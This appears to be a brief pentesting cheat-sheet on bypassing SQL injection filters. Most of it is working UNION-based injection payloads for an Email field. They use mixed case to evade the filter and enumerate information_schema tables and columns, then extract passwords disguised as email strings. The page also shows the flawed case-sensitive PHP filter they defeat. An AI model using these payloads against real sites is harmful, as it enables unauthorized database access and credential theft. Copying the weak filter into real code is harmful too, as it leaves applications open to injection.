Bypassing SQL Filters
UNION Filters
Email=’ UNion select 1,2,3,concat(command,
"@test.com") -- -
Email=' UNion select
1,2,3,concat(table_name, "@test.com") FROM
information_schema.tables where
table_schema="databasename" limit 1,1 -- -Email=' UNion select
1,2,3,concat(column_name, "@test.com")
FROM information_schema.columns where
table_name="tablename" limit 2,1 -- -
Email= ' UNion select
1,2,3,concat(password, “@test.com”) FROM
tablename limit 1,1 -- -if(strpos($user,"UNION") ||
strpos($user,"INFORMATION_SCHEMA") ||
strpos($user,"union") ) {
echo "Error"; die;
}
Last updated